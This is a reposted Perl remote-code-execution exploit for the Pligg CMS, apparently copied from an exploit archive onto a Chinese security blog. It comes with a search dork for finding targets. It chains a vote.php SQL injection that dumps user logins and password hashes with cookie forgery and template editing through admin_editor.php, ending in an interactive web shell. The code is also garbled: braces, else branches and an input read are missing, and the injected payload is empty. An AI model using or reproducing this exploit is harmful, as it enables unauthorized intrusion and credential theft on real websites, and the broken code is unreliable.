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Pligg _Exploit_网络安全_

2024-03-23 15:18:25 89
#!/usr/bin/perl -w
use LWP::UserAgent;
use MIME::Base64;
use Digest::MD5 qw(md5_hex);
use Getopt::Std; getopts('h:', \%args);

print "#############################################\n";
print "# Pligg <= 9.9 Remote Code Execution Exploit \n";
print "#############################################\n";
#dork = "Powered By Pligg" "Legal: License and Source"

# Proxy address
$ENV{http_proxy} = '';

my $http = LWP::UserAgent->new;
$http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2008070208 Firefox/3.0.1');
#$http->env_proxy(); # <-- uncomment for proxy

my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
my $user = undef;
my $pass = undef;
my $file = undef;
my $data = undef;
my @auth = undef;

# Details for the php code that is injected in to the template
my $ereg = '(.*?)<\/cmdout>';
my $cvar = 'cmd';
my $cval = 'pwd;id';
my $code = '';

print "[*] Checking if a shell already exists ...\n";

$data = $http->post(
$host . '/index.php',
$cvar => $cval

if ( $data->content =~ /$ereg/si )
print "[*] Found existing shell ...\n";
print "[!] No existing shell found ...\n";

# Gather user info via vote.php SQL Injection

$data = $http->post(
$host . '/vote.php',
'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',
'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works

print "[*] Gathering user information ...\n";

if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )
$user = $1;
$pass = $2;

# Sets up the cookie to authenticate us
@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');

print "[ ] Got user '$user' ...\n";

print "[!] Unable to get user info. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

# Get the template path

print "[*] Gathering template information ...\n";

$data = $http->get($host . '/admin_editor.php',@auth);

if ( $data->content =~ />(.*?)<\/option>/i )
$file = $1;
# Quick and dirty fix
$file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
print "[ ] Got template file [$file]...\n";

# Read the template contents

$data = $http->post(
$host . '/admin_editor.php',
'the_file' => $file,
'open' => 'Open'

print "[*] Reading template data ...\n";

# Grab the template contents
if ( $data->content =~ /(.*)<\/textarea>/is )
$temp = $2;
$temp =~ s/>/>/ig;
$temp =~ s/</$temp =~ s/"/"/ig;
$temp =~ s/&/&/ig;

print "[ ] Got template data ...\n";
print "[!] Unable to get template data. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

# Update the Template Contents

$data = $http->post(
$host . '/admin_editor.php',
'the_file2' => $file,
'updatedfile' => $temp . $code,
'save' => 'Save Changes'

print "[*] Updating template data ...\n";

if ( $data->content =~ /File Saved/is )
print "[ ] File saved!\n";
print "[!] Unable to update template data. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

# Setting up the php shell

print "[*] Setting up shell ...\n";

$data = $http->post(
$host . '/index.php',
$cvar => $cval

if ( $data->content =~ /(.*?)<\/cmdout>/si )
while ( 1 )
print "pligg:~#";
$exec = ;

$data = $http->post(
$host . '/index.php',
$cvar => $exec

if ( $data->content =~ /$ereg/si )
print $1 . "\n";
print "Unexpected Response!\n";
print "[!] Unable to set up shell ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);

sub usage
print "pligg_exploit.pl -h http://path/to/pligg \n";

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